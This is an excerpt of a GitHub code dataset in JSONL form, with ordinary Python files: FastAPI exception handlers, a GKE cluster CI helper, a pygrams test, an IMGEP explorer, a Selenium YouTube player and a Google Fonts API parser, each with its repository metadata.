screen.getch()\r\n\r\n\r\nwrapper(main)\r\n", "repo_name": "littlepippilongstocking/Intermediate-Python-Projects", "sub_path": "shortest-path.py", "file_name": "shortest-path.py", "file_ext": "py", "file_size_in_byte": 2817, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "curses.color_pair", "line_number": 30, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 31, "usage_type": "call"}, {"api_name": "queue.Queue", "line_number": 55, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 66, "usage_type": "call"}, {"api_name": "curses.init_pair", "line_number": 102, "usage_type": "call"}, {"api_name": "curses.COLOR_CYAN", "line_number": 102, "usage_type": "attribute"}, {"api_name": "curses.COLOR_WHITE", "line_number": 102, "usage_type": "attribute"}, {"api_name": "curses.init_pair", "line_number": 103, "usage_type": "call"}, {"api_name": "curses.COLOR_RED", "line_number": 103, "usage_type": "attribute"}, {"api_name": "curses.COLOR_WHITE", "line_number": 103, "usage_type": "attribute"}, {"api_name": "curses.wrapper", "line_number": 109, "usage_type": "call"}]} +{"seq_id": "14526695224", "text": "from fastapi import Request\nfrom starlette.responses import JSONResponse\n\n\nclass AppExceptionCase(Exception):\n def __init__(self, status_code: int, context: dict):\n self.exception_case = self.__class__.__name__\n self.status_code = status_code\n self.context = context\n\n def __str__(self):\n return (\n f\"\"\n )\n\n\nasync def app_exception_handler(request: Request, exc: AppExceptionCase):\n return JSONResponse(\n status_code=exc.status_code,\n content={\n \"app_exception\": exc.exception_case,\n \"context\": exc.context,\n },\n )\n\n\nclass AppException(object):\n class HttpRequestParamsIllegal(AppExceptionCase):\n def __init__(self, context: dict = None):\n \"\"\"\n HTTP请求的参数错误\n \"\"\"\n status_code = 422\n AppExceptionCase.__init__(self, status_code, context)\n\n class HttpRequestTimeout(AppExceptionCase):\n def __init__(self, context: dict = None):\n \"\"\"\n HTTP请求超时\n \"\"\"\n status_code = 504\n AppExceptionCase.__init__(self, status_code, context)\n", "repo_name": "lvyv/phmMS", "sub_path": "app/utils/app_exceptions.py", "file_name": "app_exceptions.py", "file_ext": "py", "file_size_in_byte": 1284, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "fastapi.Request", "line_number": 18, "usage_type": "name"}, {"api_name": "starlette.responses.JSONResponse", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "14895195628", "text": "#!/usr/bin/env python3\n\n\"\"\"\nClusters used in test\n\nCopied from https://github.com/stackrox/stackrox/blob/master/.openshift-ci/clusters.py\n\"\"\"\n\nimport os\nimport signal\nimport subprocess\nimport time\n\nfrom common import popen_graceful_kill\n\n\nclass NullCluster:\n def provision(self):\n pass\n\n def teardown(self):\n pass\n\n\nclass GKECluster:\n # Provisioning timeout is tightly coupled to the time it may take gke.sh to\n # create a cluster.\n PROVISION_TIMEOUT = 90 * 60\n WAIT_TIMEOUT = 20 * 60\n TEARDOWN_TIMEOUT = 5 * 60\n PROVISION_PATH = \"scripts/ci/gke.sh\"\n WAIT_PATH = \"scripts/ci/gke.sh\"\n REFRESH_PATH = \"scripts/ci/gke.sh\"\n TEARDOWN_PATH = \"scripts/ci/gke.sh\"\n\n def __init__(self, cluster_id, num_nodes=3, machine_type=\"e2-standard-4\"):\n self.cluster_id = cluster_id\n self.num_nodes = num_nodes\n self.machine_type = 
machine_type\n self.refresh_token_cmd = None\n\n def provision(self):\n with subprocess.Popen(\n [\n GKECluster.PROVISION_PATH,\n \"provision_gke_cluster\",\n self.cluster_id,\n str(self.num_nodes),\n self.machine_type,\n ]\n ) as cmd:\n\n try:\n exitstatus = cmd.wait(GKECluster.PROVISION_TIMEOUT)\n if exitstatus != 0:\n raise RuntimeError(f\"Cluster provision failed: exit {exitstatus}\")\n except subprocess.TimeoutExpired as err:\n popen_graceful_kill(cmd)\n raise err\n\n # OpenShift CI sends a SIGINT when tests are canceled\n signal.signal(signal.SIGINT, self.sigint_handler)\n\n subprocess.run(\n [GKECluster.WAIT_PATH, \"wait_for_cluster\"],\n check=True,\n timeout=GKECluster.WAIT_TIMEOUT,\n )\n\n # pylint: disable=consider-using-with\n self.refresh_token_cmd = subprocess.Popen(\n [GKECluster.REFRESH_PATH, \"refresh_gke_token\"]\n )\n\n return self\n\n def teardown(self):\n while os.path.exists(\"/tmp/hold-cluster\"):\n print(\"Pausing teardown because /tmp/hold-cluster exists\")\n time.sleep(60)\n\n if self.refresh_token_cmd is not None:\n print(\"Terminating GKE token refresh\")\n try:\n popen_graceful_kill(self.refresh_token_cmd)\n except Exception as err:\n print(f\"Could not terminate the token refresh: {err}\")\n\n subprocess.run(\n [GKECluster.TEARDOWN_PATH, \"teardown_gke_cluster\"],\n check=True,\n timeout=GKECluster.TEARDOWN_TIMEOUT,\n )\n\n return self\n\n def sigint_handler(self, signum, frame):\n print(\"Tearing down the cluster due to SIGINT\", signum, frame)\n self.teardown()\n", "repo_name": "stackrox/scanner", "sub_path": ".openshift-ci/clusters.py", "file_name": "clusters.py", "file_ext": "py", "file_size_in_byte": 2844, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 38, "dataset": "github-code", "pt": "52", "api": [{"api_name": "subprocess.Popen", "line_number": 43, "usage_type": "call"}, {"api_name": "subprocess.TimeoutExpired", "line_number": 57, "usage_type": "attribute"}, {"api_name": "common.popen_graceful_kill", "line_number": 58, "usage_type": "call"}, {"api_name": "signal.signal", "line_number": 62, "usage_type": "call"}, {"api_name": "signal.SIGINT", "line_number": 62, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 64, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 80, "usage_type": "call"}, {"api_name": "common.popen_graceful_kill", "line_number": 85, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 89, "usage_type": "call"}]} +{"seq_id": "42445769529", "text": "import unittest\n\nfrom scripts.algorithms.term_focus import TermFocus\nfrom scripts.text_processing import LemmaTokenizer\nfrom scripts.tfidf_wrapper import tfidf_from_text\nfrom tests.utils import ReferenceData\n\n\n@unittest.skip(\"Temporarily shut down module\")\nclass TestFocus(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.num_ngrams = 5\n cold_tfidf = tfidf_from_text(ReferenceData.cold_df, tokenizer=LemmaTokenizer(), ngram_range=(2, 3))\n random_tfidf = tfidf_from_text(ReferenceData.random_df, tokenizer=LemmaTokenizer(), ngram_range=(2, 3))\n cls.tfocus = TermFocus(cold_tfidf, random_tfidf)\n\n def test_popular_ngrams_by_no_focus(self):\n expected_output = {'cold air flow', 'constant temperature', 'freezing chamber', 'ice store ready',\n 'utility chamber'}\n _, actual_output, 
_ = self.tfocus.detect_and_focus_popular_ngrams('sum', False, None, None, 1, self.num_ngrams)\n\n self.assertEqual(expected_output, actual_output)\n\n def test_popular_ngrams_by_set_focus(self):\n expected_output = {'cold air flow', 'constant temperature', 'freezing chamber', 'ice store ready',\n 'utility chamber'}\n _, actual_output, _ = self.tfocus.detect_and_focus_popular_ngrams('sum', False, 'set', None, 1, self.num_ngrams)\n self.assertEqual(expected_output, actual_output)\n\n def test_popular_ngrams_by_chi2_focus(self):\n expected_output = {'constant temperature', 'ice store', 'ice store ready', 'refrigerating chamber',\n 'store ready'}\n _, actual_output, _ = self.tfocus.detect_and_focus_popular_ngrams('sum', False, 'chi2', None, 1,\n self.num_ngrams)\n self.assertEqual(expected_output, actual_output)\n\n def test_popular_ngrams_by_mutual_focus(self):\n expected_output = {'refrigerating chamber', 'upper section', 'upper space', 'utility chamber', 'warm section'}\n _, actual_output, _ = self.tfocus.detect_and_focus_popular_ngrams('sum', False, 'mutual', None, 1,\n self.num_ngrams)\n self.assertEqual(expected_output, actual_output)\n", "repo_name": "datasciencecampus/pygrams", "sub_path": "tests/algorithms/test_focus.py", "file_name": "test_focus.py", "file_ext": "py", "file_size_in_byte": 2278, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 59, "dataset": "github-code", "pt": "52", "api": [{"api_name": "unittest.TestCase", "line_number": 10, "usage_type": "attribute"}, {"api_name": "scripts.tfidf_wrapper.tfidf_from_text", "line_number": 15, "usage_type": "call"}, {"api_name": "tests.utils.ReferenceData.cold_df", "line_number": 15, "usage_type": "attribute"}, {"api_name": "tests.utils.ReferenceData", "line_number": 15, "usage_type": "name"}, {"api_name": "scripts.text_processing.LemmaTokenizer", "line_number": 15, "usage_type": "call"}, {"api_name": "scripts.tfidf_wrapper.tfidf_from_text", "line_number": 16, "usage_type": "call"}, {"api_name": "tests.utils.ReferenceData.random_df", "line_number": 16, "usage_type": "attribute"}, {"api_name": "tests.utils.ReferenceData", "line_number": 16, "usage_type": "name"}, {"api_name": "scripts.text_processing.LemmaTokenizer", "line_number": 16, "usage_type": "call"}, {"api_name": "scripts.algorithms.term_focus.TermFocus", "line_number": 17, "usage_type": "call"}, {"api_name": "unittest.skip", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "15043608307", "text": "import torch\nimport random\nimport os\nfrom addict import Dict\nfrom evocraftsearch import Explorer\nfrom evocraftsearch.spaces import BoxSpace\nfrom evocraftsearch.utils import sample_value\nimport numbers\nfrom tqdm import tqdm\nfrom exputils.seeding import set_seed\n\nclass BoxGoalSpace(BoxSpace):\n def __init__(self, representation, autoexpand=True, low=0., high=0., shape=None, dtype=torch.float32):\n self.representation = representation\n self.autoexpand = autoexpand\n if shape is not None:\n if isinstance(shape, list) or isinstance(shape, tuple):\n assert len(shape) == 1 and shape[0] == self.representation.n_latents\n elif isinstance(shape, numbers.Number):\n assert shape == self.representation.n_latents\n BoxSpace.__init__(self, low=low, high=high, shape=(self.representation.n_latents,), dtype=dtype)\n\n\n def map(self, observations, **kwargs):\n embedding = self.representation.calc(observations, **kwargs)\n if self.autoexpand:\n embedding_c = embedding.cpu().detach()\n is_nan_mask = torch.isnan(embedding_c)\n if is_nan_mask.sum() > 0:\n 
embedding_c[is_nan_mask] = self.low[is_nan_mask]\n self.low = torch.min(self.low, embedding_c)\n embedding_c[is_nan_mask] = self.high[is_nan_mask]\n self.high = torch.max(self.high, embedding_c)\n else:\n self.low = torch.min(self.low, embedding_c)\n self.high = torch.max(self.high, embedding_c)\n return embedding\n\n def calc_distance(self, embedding_a, embedding_b, **kwargs):\n scale = (self.high - self.low).to(self.representation.config.device)\n scale[torch.where(scale == 0.0)] = 1.0\n low = self.low.to(self.representation.config.device)\n # L2 by default\n embedding_a = (embedding_a - low) / scale\n embedding_b = (embedding_b - low) / scale\n dist = (embedding_a - embedding_b).pow(2).sum(-1).sqrt()\n return dist\n\n def sample(self):\n return BoxSpace.sample(self).to(self.representation.config.device)\n\n def save(self, filepath):\n torch.save(self, filepath)\n\n @staticmethod\n def load(filepath, map_location='cpu'):\n goal_space = torch.load(filepath, map_location='cpu')\n return goal_space\n\n\n\n\nclass IMGEPExplorer(Explorer):\n \"\"\"\n Basic explorer that samples goals in a goalspace and uses a policy library to generate parameters to reach the goal.\n \"\"\"\n\n # Set these in ALL subclasses\n goal_space = None # defines the obs->goal representation and the goal sampling strategy (self.goal_space.sample())\n reach_goal_optimizer = None\n\n @staticmethod\n def default_config():\n default_config = Dict()\n # base config\n default_config.seed = None\n default_config.num_of_random_initialization = 10 # number of random runs at the beginning of exploration to populate the IMGEP memory\n default_config.frequency_of_random_initialization = 10 # number of random runs at during exploration\n\n # Pi: source policy parameters config\n default_config.source_policy_selection = Dict()\n default_config.source_policy_selection.type = 'optimal'\n # default_config.source_policy_selection.type = 'kNN_elite'\n # default_config.source_policy_selection.k = 50\n\n # Opt: Optimizer to reach goal\n default_config.reach_goal_optim_steps = 10\n\n return default_config\n\n def __init__(self, system, explorationdb, goal_space, config={}, score_function=None, **kwargs):\n super().__init__(system=system, explorationdb=explorationdb, config=config, **kwargs)\n\n self.goal_space = goal_space\n\n # initialize policy library\n self.policy_library = []\n\n # initialize goal library\n self.goal_library = torch.empty((0,) + self.goal_space.shape).to(self.goal_space.representation.config.device)\n\n # save score function f(observations) = score\n self.score_function = score_function\n\n # initialize policy scores\n self.policy_scores = []\n\n\n def get_source_policy_idx(self, target_goal):\n\n if self.config.source_policy_selection.type == 'optimal':\n # get distance to other goals\n goal_distances = self.goal_space.calc_distance(target_goal, self.goal_library)\n\n # select goal with minimal distance\n isnan_distances = torch.isnan(goal_distances)\n if (~isnan_distances).sum().item() == 0:\n source_policy_idx = sample_value(('discrete', 0, len(self.goal_library) - 1))\n else:\n canditates = torch.where(goal_distances == goal_distances[~isnan_distances].min())[0]\n source_policy_idx = random.choice(canditates)\n\n elif self.config.source_policy_selection.type == \"kNN_elite\":\n # get distance to other goals\n goal_distances = self.goal_space.calc_distance(target_goal, self.goal_library)\n\n # select k closest reached goals\n isnan_distances = torch.isnan(goal_distances)\n if (~isnan_distances).sum().item() == 0:\n 
source_policy_idx = sample_value(('discrete', 0, len(self.goal_library) - 1))\n else:\n notnan_inds = torch.where(~isnan_distances)[0]\n notnan_distances = goal_distances[~isnan_distances]\n _, rel_candidates = notnan_distances.topk(min(self.config.source_policy_selection.k, len(notnan_distances)), largest=False)\n candidates = notnan_inds[rel_candidates]\n\n # select elite among those k\n candidate_scores = torch.tensor(self.policy_scores)[candidates]\n isnan_scores = torch.isnan(candidate_scores)\n source_policy_candidates = torch.where(candidate_scores == candidate_scores[~isnan_scores].max())[0]\n source_policy_idx = random.choice(candidates[source_policy_candidates])\n\n\n elif self.config.source_policy_selection.type == 'random':\n source_policy_idx = sample_value(('discrete', 0, len(self.goal_library) - 1))\n\n else:\n raise ValueError('Unknown source policy selection type {!r} in the configuration!'.format(\n self.config.source_policy_selection.type))\n\n return source_policy_idx\n\n def run(self, n_exploration_runs, continue_existing_run=False, save_frequency=None, save_filepath=None):\n\n print('Exploration: ')\n progress_bar = tqdm(total=n_exploration_runs)\n if continue_existing_run:\n run_idx = len(self.policy_library)\n progress_bar.update(run_idx)\n else:\n self.policy_library = []\n self.goal_library = torch.empty((0,) + self.goal_space.shape)\n run_idx = 0\n\n self.goal_library = self.goal_library.to(self.goal_space.representation.config.device)\n\n while run_idx < n_exploration_runs:\n\n set_seed(100000 * self.config.seed + run_idx)\n\n # Initial Random Sampling of Parameters\n if (run_idx < self.config.num_of_random_initialization) or (run_idx % self.config.frequency_of_random_initialization == 0):\n\n target_goal = None\n source_policy_idx = None\n\n policy_parameters = self.system.sample_policy_parameters()\n self.system.reset(policy=policy_parameters)\n\n with torch.no_grad():\n observations = self.system.run()\n reached_goal = self.goal_space.map(observations)\n if self.score_function is not None:\n policy_score = self.score_function.map(observations).item()\n else:\n policy_score = 0.0\n\n optim_step_idx = 0\n dist_to_target = None\n\n # Goal-directed Sampling of Parameters\n else:\n\n # sample a goal space from the goal space\n target_goal = self.goal_space.sample() # provide the explorer to sampling function if needed (ef: for sampling in less dense region we need access to self.goal_library, etc)\n\n # get source policy which should be mutated\n source_policy_idx = self.get_source_policy_idx(target_goal)\n source_policy = self.policy_library[source_policy_idx]\n\n # apply a mutation\n policy_parameters = self.system.mutate_policy_parameters(source_policy)\n self.system.reset(policy=policy_parameters)\n\n # Optimization toward target goal\n if isinstance(self.system, torch.nn.Module) and self.config.reach_goal_optim_steps > 0:\n\n train_losses = self.system.optimize(self.config.reach_goal_optim_steps, lambda obs: self.goal_space.calc_distance(target_goal, self.goal_space.map(obs)))\n print(train_losses)\n policy_parameters['initialization'] = self.system.initialization_parameters\n policy_parameters['update_rule'] = self.system.update_rule_parameters\n\n with torch.no_grad():\n observations = self.system.run()\n reached_goal = self.goal_space.map(observations)\n loss = self.goal_space.calc_distance(target_goal, reached_goal)\n dist_to_target = loss.item()\n if self.score_function is not None:\n policy_score = self.score_function.map(observations).item()\n else:\n 
policy_score = 0.0\n\n # save results\n self.db.add_run_data(id=run_idx,\n policy_parameters=policy_parameters,\n observations=observations,\n source_policy_idx=source_policy_idx,\n target_goal=target_goal,\n reached_goal=reached_goal,\n dist_to_target=dist_to_target,\n policy_score=policy_score)\n\n if self.db.config.save_rollout_render:\n self.system.render_rollout(observations, filepath=os.path.join(self.db.config.db_directory,\n f'run_{run_idx}_rollout'))\n\n\n # add policy and reached goal into the libraries\n # do it after the run data is saved to not save them if there is an error during the saving\n self.policy_library.append(policy_parameters)\n self.policy_scores.append(policy_score)\n self.goal_library = torch.cat([self.goal_library, reached_goal.reshape(1, -1)])\n\n if (save_frequency is not None) and (run_idx % save_frequency == 0):\n if (save_filepath is not None) and (os.path.exists(save_filepath)):\n self.save(save_filepath)\n\n # increment run_idx\n run_idx += 1\n progress_bar.update(1)\n\n def save(self, filepath):\n self.goal_space.save(filepath+\"goal_space.pickle\")\n tmp_goal_space = self.goal_space\n self.goal_space = None\n tmp_score_function = self.score_function\n self.score_function = None\n Explorer.save(self, filepath+\"explorer.pickle\")\n self.goal_space = tmp_goal_space\n self.score_function = tmp_score_function", "repo_name": "mayalenE/evocraftsearch", "sub_path": "explorers/imgep_explorer.py", "file_name": "imgep_explorer.py", "file_ext": "py", "file_size_in_byte": 11526, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.float32", "line_number": 13, "usage_type": "attribute"}, {"api_name": "numbers.Number", "line_number": 19, "usage_type": "attribute"}, {"api_name": "evocraftsearch.spaces.BoxSpace.__init__", "line_number": 21, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.isnan", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.min", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.min", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 41, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace.sample", "line_number": 50, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 57, "usage_type": "call"}, {"api_name": "evocraftsearch.Explorer", "line_number": 63, "usage_type": "name"}, {"api_name": "addict.Dict", "line_number": 74, "usage_type": "call"}, {"api_name": "addict.Dict", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.empty", "line_number": 100, "usage_type": "call"}, {"api_name": "torch.isnan", "line_number": 116, "usage_type": "call"}, {"api_name": "evocraftsearch.utils.sample_value", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 120, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.isnan", "line_number": 128, "usage_type": "call"}, {"api_name": "evocraftsearch.utils.sample_value", "line_number": 
130, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.isnan", "line_number": 139, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 140, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 141, "usage_type": "call"}, {"api_name": "evocraftsearch.utils.sample_value", "line_number": 145, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.empty", "line_number": 162, "usage_type": "call"}, {"api_name": "exputils.seeding.set_seed", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 206, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 213, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 234, "usage_type": "call"}, {"api_name": "os.path", "line_number": 234, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 242, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 245, "usage_type": "call"}, {"api_name": "os.path", "line_number": 245, "usage_type": "attribute"}, {"api_name": "evocraftsearch.Explorer.save", "line_number": 258, "usage_type": "call"}, {"api_name": "evocraftsearch.Explorer", "line_number": 258, "usage_type": "name"}]} +{"seq_id": "74411110883", "text": "from time import sleep\nfrom sys import exit\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.service import Service\nfrom localStoragePy import localStoragePy\n#localStorage config\nls = localStoragePy(\"playlistDatabase\",\"json\")\n\n#driver config\noptions = webdriver.FirefoxOptions()\nuser_agent = '--user-agent=Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) CriOS/56.0.2924.75 Mobile/14E5239e Safari/602.1'\noptions.add_argument(user_agent)\noptions.binary_location = r'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\noptions.add_argument(\"--headless\")\noptions.add_argument(\"--log-level\")\noptions.add_argument(\"--window-size=1920,1080\")\noptions.add_argument('--ignore-certificate-errors')\noptions.add_argument(\"start-maximized\")\noptions.add_argument(\"disable-infobars\")\noptions.add_argument('--no-sandbox')\noptions.add_argument(\"--disable-gpu\")\noptions.add_argument('--disable-application-cache')\noptions.add_argument(\"--disable-dev-shm-usage\")\nser = Service(\"geckodriver.exe\")\nextension1 = \"C://Users//dipu6//Downloads//ublock_origin-1.46.0.xpi\"\nextension2 = \"C://Users//dipu6//Downloads//image_blocker_plus-0.2.0.xpi\"\ndriver = webdriver.Firefox(service=ser,options=options)\ndriver.install_addon(extension1, temporary=True)\ndriver.install_addon(extension2, temporary=True)\n\n#functions\n#songs\ndef stream(MusicName):\n MusicName = MusicName\n driver.get(f\"https://m.youtube.com/results?search_query={MusicName}\")\n driver.implicitly_wait(3)\n video =driver.find_element(\"xpath\",\"/html/body/ytd-app/div[1]/ytd-page-manager/ytd-search/div[1]/ytd-two-column-search-results-renderer/div[2]/div/ytd-section-list-renderer/div[2]/ytd-item-section-renderer/div[3]/ytd-video-renderer[1]/div[1]/div/div[1]/div/h3/a/yt-formatted-string\")\n video.click()\n\ndef pauseAndPlay():\n pauseVideo = 
driver.find_element(\"xpath\",\"/html/body/ytd-app/div[1]/ytd-page-manager/ytd-watch-flexy/div[5]/div[1]/div/div[1]/div[2]/div/div/ytd-player/div/div/div[1]/video\")\n driver.implicitly_wait(1)\n pauseVideo.click()\n\ndef track():\n track = driver.find_element(\"xpath\",\"/html/body/ytd-app/div[1]/ytd-page-manager/ytd-watch-flexy/div[5]/div[1]/div/div[2]/ytd-watch-metadata/div/div[1]/h1/yt-formatted-string\")\n artist = driver.find_element(\"xpath\",\"/html/body/ytd-app/div[1]/ytd-page-manager/ytd-watch-flexy/div[5]/div[1]/div/div[2]/ytd-watch-metadata/div/div[2]/div[1]/ytd-video-owner-renderer/div[1]/ytd-channel-name/div/div/yt-formatted-string/a\")\n print(f\"{track.text} - {artist.text}\")\n\ndef next():\n next = driver.find_element(\"xpath\",\"/html/body/ytd-app/div[1]/ytd-page-manager/ytd-watch-flexy/div[5]/div[1]/div/div[1]/div[2]/div/div/ytd-player/div/div/div[27]/div[2]/div[1]/a[2]\")\n driver.implicitly_wait(1)\n next.click()\n\ndef previous():\n previous = driver.find_element(\"xpath\",\"/html/body/ytd-app/div[1]/ytd-page-manager/ytd-watch-flexy/div[5]/div[1]/div/div[1]/div[2]/div/div/ytd-player/div/div/div[27]/div[2]/div[1]/a[1]\")\n driver.implicitly_wait(1)\n previous.click()\n\n\n#playlists\ndef streamPlaylist(playlistName):\n url = ls.getItem(playlistName)\n\n if url != None:\n driver.get(url)\n driver.implicitly_wait(2.5)\n shuffle = driver.find_element(\"xpath\",\"/html/body/ytd-app/div[1]/ytd-page-manager/ytd-browse/ytd-playlist-header-renderer/div/div[2]/div[1]/div/div[2]/ytd-button-renderer[2]/yt-button-shape/a/yt-touch-feedback-shape/div/div[2]\")\n shuffle.click()\n else:\n print(\"playlist not found......\")\n print(\"re enter name properly\")\n\ndef addPlaylist(name, url):\n ls.setItem(name,url)\n sleep(1)\n print(\"stored....\")\n\ndef removePlaylist(playlistName):\n ls.removeItem(playlistName)\n print(\"removed....\")\n\ndef stop():\n driver.quit()\n exit(1)\n\n\nif __name__ == \"__main__\":\n print(\"Enter the name of song or choose playlist:\")\n while True:\n uinput = str(input())\n if uinput.split(\" \",1)[0] == \"st\":\n songName = uinput.split(\" \",1)[1]\n stream(songName)\n\n elif uinput == \"stop\":\n stop()\n\n elif uinput == \"play\" or uinput == \"pause\":\n pauseAndPlay()\n\n elif uinput == \"track\":\n track()\n\n elif uinput.split(\" \",1)[0] == \"pt\":\n pName = uinput.split(\" \",1)[1]\n streamPlaylist(pName)\n\n elif uinput.split(\" \",1)[0] == 'add':\n url = uinput.split(\" \", 1)[1]\n Name = str(input(\"enter name of playlist:\"))\n addPlaylist(Name, url)\n\n elif uinput.split(\" \",1)[0] == \"rem\":\n name = uinput.split(\" \",1)[1]\n removePlaylist(name)\n\n elif uinput == \"next\":\n next()\n\n elif uinput == \"prev\":\n previous()\n\n else:\n print(\"..Invalid Command..\")\n", "repo_name": "toastx/YoutubeMusicPlayer", "sub_path": "Player.py", "file_name": "Player.py", "file_ext": "py", "file_size_in_byte": 4921, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "localStoragePy.localStoragePy", "line_number": 7, "usage_type": "call"}, {"api_name": "selenium.webdriver.FirefoxOptions", "line_number": 10, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 10, "usage_type": "name"}, {"api_name": "selenium.webdriver.firefox.service.Service", "line_number": 24, "usage_type": "call"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 27, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 27, "usage_type": "name"}, 
{"api_name": "time.sleep", "line_number": 76, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "72427012005", "text": "import requests\nimport json\nfrom typing import Union\nimport os\nimport re\nfrom dotenv import load_dotenv\n\n# Load .env file\nload_dotenv()\n\n\ndef prepare_url(url: str) -> str:\n \"\"\" Prepare url for Google Fonts API.\n :param url: Google Fonts API url.\n :return: Prepared url.\n :throw: None.\n :rtype: str.\n :Example:\n >>> prepare_url(url)\n \"\"\"\n return url.replace(':KEY', os.getenv('GOOGLE_API_KEY'))\n\n\ndef get_fonts_from_gapi(url: str) -> Union[dict, None]:\n \"\"\" Get fonts from Google Fonts API.\n :param url: Google Fonts API url.\n :return: Dictionary with fonts if successful, None otherwise.\n :throw: None.\n :rtype: dict or None.\n :Example:\n >>> get_fonts(url)\n \"\"\"\n try:\n response = requests.get(url)\n if response.status_code == 200:\n data = json.loads(response.text)\n return data[\"items\"]\n else:\n return None\n except Exception as e:\n return None\n\n\ndef parse_fonts(fonts: dict) -> dict:\n \"\"\" Parse fonts from Google Fonts API.\n :param fonts: Dictionary with fonts.\n :return: Dictionary with parsed fonts.\n :throw: None.\n :rtype: dict.\n :Example:\n >>> parse_fonts(fonts)\n \"\"\"\n data = {\n \"languages\": [],\n \"fonts\": [],\n \"categories\": []\n }\n for font in fonts:\n languages = font['subsets']\n category = font['category']\n for lang in languages:\n # Remove '-' with space and capatilize first letter.\n lang = lang.replace('-', ' ')\n lang = ' '.join(word.capitalize() for word in lang.split())\n\n if lang not in data['languages']:\n data['languages'].append(lang)\n if category not in data['categories']:\n data['categories'].append(category)\n \n v = font['variants']\n variants = []\n for variant in v:\n # search numeric with italic\n if re.search(r'\\d+italic', variant):\n variants.append(variant.replace('italic', 'i'))\n elif variant == 'regular': continue\n else:\n variants.append(variant)\n \n data['fonts'].append(\n {\n # remove space with +.\n 'family': font['family'].replace(' ', '+'),\n 'variants': variants,\n # 'files': font['files'],\n # 'lastModified': font['lastModified'],\n 'subsets': languages,\n 'category': category\n }\n )\n return data\n\n\ndef create_json(data: dict, path: str = 'fonts.json') -> None:\n \"\"\" Create json file with fonts.\n :param data: Dictionary with fonts.\n :return: None.\n :throw: None.\n :rtype: None.\n :Example:\n >>> create_json(data)\n \"\"\"\n with open(path, 'w') as f:\n json.dump(data, f, indent=4)\n", "repo_name": "lablnet/fontpicker", "sub_path": "script/fonts.py", "file_name": "fonts.py", "file_ext": "py", "file_size_in_byte": 2874, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 9, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 21, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 34, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 36, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 24, "usage_type": "name"}, {"api_name": "re.search", "line_number": 75, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 105, "usage_type": "call"}]} +{"seq_id": "43341856944", "text": "import numpy as np\nimport plotly.graph_objects as go\n\npoints = np.array([\n (-2, 0, 0),\n (2, 0, 0),\n (1, 2, 2)\n])\n\nplane1 = np.array([\n (-2.5, 
